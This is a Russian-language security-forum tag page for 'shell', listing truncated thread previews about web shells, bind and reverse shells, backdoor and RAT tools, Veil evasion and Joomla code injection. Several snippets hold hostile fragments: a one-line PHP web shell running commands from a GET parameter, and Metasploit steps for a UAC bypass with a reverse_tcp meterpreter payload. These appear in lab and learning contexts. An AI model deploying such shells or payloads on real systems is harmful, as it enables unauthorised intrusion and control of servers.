• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь. Мобильный клиент для IOS находится в itunes по этой ссылке

shell

  1. Tayrus

    Создание Emojis PHP WebShell

    Я недавно наткнулся на интересное поведение c PHP. По-видимому, PHP допускает использование символов Юникода в качестве имен переменных. Поэтому emojis могут быть использованы в качестве переменной PHP. <?php $😶="Hello World!"; echo($😶); Вывод >> Hello World! Я думал о том, чтобы сделать...
  2. Sykes

    Помощь в загрузке шелла в CRM Pentest lab 11.

    Не выходит загрузить шелл на сайт, всё делается по канонам и гайдам. Burp Community, обновлен из реп, прокси через FoxyProxy, шелл вида <? echo shell_exec($_GET['cmd']) ?> или <? echo shell_exec($_GET['e'].' 2>&1'); ?>. Грузил шелл в jpg, jpeg, gif, барпом ловил запрос и менял расширение шелла...
  3. E

    Проблема Не работает shell

    Всем привет! Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей. В...
  4. Vertigo

    Vegile Управление backdoor и rootkits

    Добрый день,Уважаемые Друзья ,Форумчане и Гости,кому небезразличен пульс ИБ. Сегодня буду вас немного огорчать своим обзором (а там не знаю,может кого и радовать) Когда свои работы дарят миру такие авторы,то сомневаться в их компетенции не приходится. Далёкий привет из Индонезии. Встречаем...
  5. r0hack

    Web-Shells или как управлять сервером после получения доступа

    Всем Салам. Сегодня решил поделится с вами довольно таки интересной темой. Когда мы получаем доступ к серваку, то делать руками гадать, что где находится довольно таки сложно и все это может затянуться. Поэтому, самым оптимальным решением является залить веб-шелл, через бекдор. Сегодня я не буду...
  6. M

    Что делать с сервером?

    Привет. Так получилось что нашел много уязвимостей на сайте одного крупного московского вуза. Пиал кому-только можно в вузе, в итоге за пол года закрыли всего несколько уязвимостей, хотя все еще осталось много критичных. К примеру в личном кабинете есть скуля, можно уронить сервер, а на основной...
  7. A

    Veil 3 Odrnance. Часть 1

    Установка Часть первая. Veil Ordnance Часть вторая. Veil Evasion Взлом удаленного компьютера. Veil-Evasion. Metasploit Veil Evasion как вы знаете обновился до третьей версии давненько (9 месяцев назад, если быть точнее). Однако более менее подробного осмотра продукта не нашёл. А если, чего то...
  8. E

    HTTP Methods - Ютилиты!

    Протестировал свой сайт и нашёл следующие уязвимости: + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, PATCH + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE'...
  9. OneDollar

    Проблема A framework for Backdoor development!

    Всем привет. Я только начинаю свой путь и активно развиваюсь благодаря форму Codeby. Но на данный момент, я не могу сделать годный обзор на фраемворк, который я нашел, на это есть несколько причин. Первая - нужно подтягивать знания англ. яз, второе - не понимаю до конца всех процессов. Но очень...
  10. Ondrik8

    SHELLCODE MAPPER

    ИНСТРУМЕНТ ДЛЯ ПРОФИ SMAP Доп. ресурсы: + http://shell-storm.org/shellcode/ + https://www.exploit-db.com/shellcode/
  11. zehrx

    Проблема Как обнаружить шелл на сервере

    Сайт на работе взломали. Система - самопис, постоянно поддерживается и модифицируется. Мест для загрузки файлов нет. Сейчас даже file_get_contents нигде не используется, только curl для сбора инфы с внешки. Fopen тоже не вижу. На что смотреть, как можно найти эту гадость. То что это шелл не...
  12. centr

    Joomla - Инфицирование движка.

    Приветствую Граждане\Товарищи! Это будет что-то вроде продолжение этого "Joomla не много WAF(куча барахла) SQL Injection" поста, так сказать вторая серия из не много серийного сериала про\о Joomla. В этой серии мы поговорим о том как: Внедрить свой PHP код в какой-нибудь файл Joomla и...
  13. ghostphisher

    Статья Ningalinet-rat - ратник за пару минут

    Всем привет! Хочу показать еще один комбайн/фабрику/фреймворк по созданию полезной нагрузки, проще говоря ратника ( троян, зловред, шелогон и т.д.). Его фишка - простота и понятность, чем то напомниает первые билды под трояны "привет 2000-е" ;) Ниже видео (не мое), сам с ним познакомлюсь...
  14. PeaceMaker

    Неудачная атака. Windows XP, 135 порт.

    Уважаемые гуру, видимо, ввиду отсутствия опыта и достаточного количества знаний я зашёл в тупик. Прошу совет - что я делаю не так? Итак: захожу в локальную сеть по WI-FI, сканирую диапазон и вижу довольно редкую в наше время машину Win XP с открытым 135 портом. Запускаю metasploit...
  15. <~DarkNode~>

    REVERSE или BIND shell? В чем разница?Какой выбрать?

    Приветствую Вас колеги. Сегодня появилась необходимость написать небольшой мануал для новичков в котором я попытаюсь донести в чем же таки разница между REVERSE и BIND шеллом и какие самые распространенные способы его получить существуют. Это в первую очередь нужно мне для того что бы можно...
  16. Kalista

    [Error 5] Access is denied

    Доброе утро, сможет кто помочь новичку? Цель (Windows 10 X64) полностью под моим контролем Cпособ: use exploit/windows/local/bypassuac_injection options set target 1 *1=64* set session 1 set LHOST ********** set payload windows/x64/meterpreter/reverse_tcp exploit run...
Вверх Снизу